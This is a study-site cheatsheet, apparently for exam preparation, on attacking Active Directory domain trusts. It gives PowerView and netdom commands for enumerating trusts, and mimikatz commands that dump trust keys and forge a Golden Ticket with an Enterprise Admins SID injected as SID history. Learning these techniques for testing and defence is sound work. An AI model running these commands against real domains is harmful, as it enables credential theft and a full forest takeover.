Domain Trust Attacks
Active Directory
Overview
Exploiting trust relationships between domains and forests.
0
Exercises
0
Flashcards
1
Mind Maps
Cheatsheet
Enumerate Trusts
# PowerView Get-DomainTrust # Enumerate trusts Get-DomainTrustMapping # Map trust relationships # Netdom netdom trust /domain:target.local # Enumerate trusts via native tool
Trust Types
- Parent-Child: Automatic, transitive
- Forest: Between forests
- External: Non-transitive
SID History Injection
# Get trust key mimikatz: lsadump::trust /patch # Dump trust keys # Create Golden Ticket with SID History mimikatz: kerberos::golden /user:admin /domain:child.local /sid:S-1-5-21-... /sids:S-1-5-21-...-519 /krbtgt:HASH /ptt # Forge inter-realm ticket with Enterprise Admin SID
ExtraSids Attack
# Add Enterprise Admins SID ticket with /sids:S-1-5-21-parent-519 # SID History injection payload
Command Examples
Common Pitfalls
- Trust direction matters for attack path
- SID filtering can block attacks
- Need to compromise child domain first
Exam Survival Tips
- Map all trusts with BloodHound
- Check for SID filtering status
- Parent-child trusts are exploitable by default